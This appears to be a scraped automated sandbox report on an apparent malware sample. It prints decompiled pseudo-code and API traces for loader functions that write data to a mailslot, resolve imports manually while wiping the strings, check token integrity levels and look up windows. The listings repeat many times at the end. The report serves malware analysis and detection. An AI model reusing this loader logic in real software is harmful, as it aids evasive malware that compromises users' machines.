RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Similarity

Total matches: 95
API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
String ID:
API String ID: 2699342322-0
Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82

C-Code - Quality: 100%

			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs

CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9

Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9

TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
CloseHandle.KERNEL32(?), ref: 004016F0
GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
CloseHandle.KERNEL32(?), ref: 00401704
GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Similarity

Total matches: 95
API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
String ID: \\.\mailslot\msl0
API String ID: 1001206095-622273203
Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981

C-Code - Quality: 94%

			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs

CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
GetLastError.KERNEL32 ref: 00401126
Sleep.KERNEL32(00000064), ref: 00401131

Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
memset.NTDLL ref: 004011C8

Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213

CloseHandle.KERNEL32(?), ref: 004011E4

Strings

\\.\mailslot\msl0, xrefs: 00401113

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring

Similarity

Total matches: 182
API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
String ID:
API String ID: 1756712956-0
Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b

APIs

PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
StrStrIW.SHLWAPI(00000000), ref: 002E12E4
HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143
librarystringloader

Similarity

Total matches: 143
API ID: lstrlenmemset$GetProcAddressLoadLibrary
String ID: ~
API String ID: 3655391705-1707062198
Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11

C-Code - Quality: 100%

			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs

LoadLibraryA.KERNEL32(?), ref: 004013B6
lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
memset.NTDLL ref: 004013D3
GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
memset.NTDLL ref: 0040143B

Strings

~, xrefs: 00401471

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread

Similarity

Total matches: 29
API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
String ID: USER32.DLL$pnls$pnls
API String ID: 1514306980-1300720345
Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25

APIs

LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520

Strings

USER32.DLL, xrefs: 002E14D3, 002E14D8, 002E14FE
pnls, xrefs: 002E1526
pnls, xrefs: 002E151B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204

Similarity

Total matches: 204
API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
String ID:
API String ID: 1755075983-0
Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
CloseHandle.KERNEL32(002E7494), ref: 002E3FEC

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false</

Loading ...

Warning!

Similarity Report

Overview

General Information

Static File Info

Similarity Information

Similar Processes

Similar Functions

Process Name: explorer.exe Analysis ID: 44237

General

Similar Executed Functions

Function 002E432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime

Function 002E1CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader

Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime

Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file

Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection

Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409

Process Name: 87024.exe Analysis ID: 56552

General

Similar Executed Functions

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative

Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native

Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile

Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader

Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204

Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile

Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file

Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection

Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection

Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader

Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization

Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread

Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime

Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305

Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string

Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file

Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory

Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file

Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection

Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409

Process Name: apdsroxy.exe Analysis ID: 60981

General

Similar Executed Functions

Function 002E432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime

Function 002E1CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative

Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native

Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile

Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader

Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile

Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file

Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection

Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection

Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader

Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization

Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread

Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143
librarystringloader

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190
memorysleepfile

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141
memorythread

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143
librarystringloader

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190
memorysleepfile

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141
memorythread

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143
librarystringloader

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190
memorysleepfile

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141
memorythread

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143
librarystringloader

Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190
memorysleepfile

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141
memorythread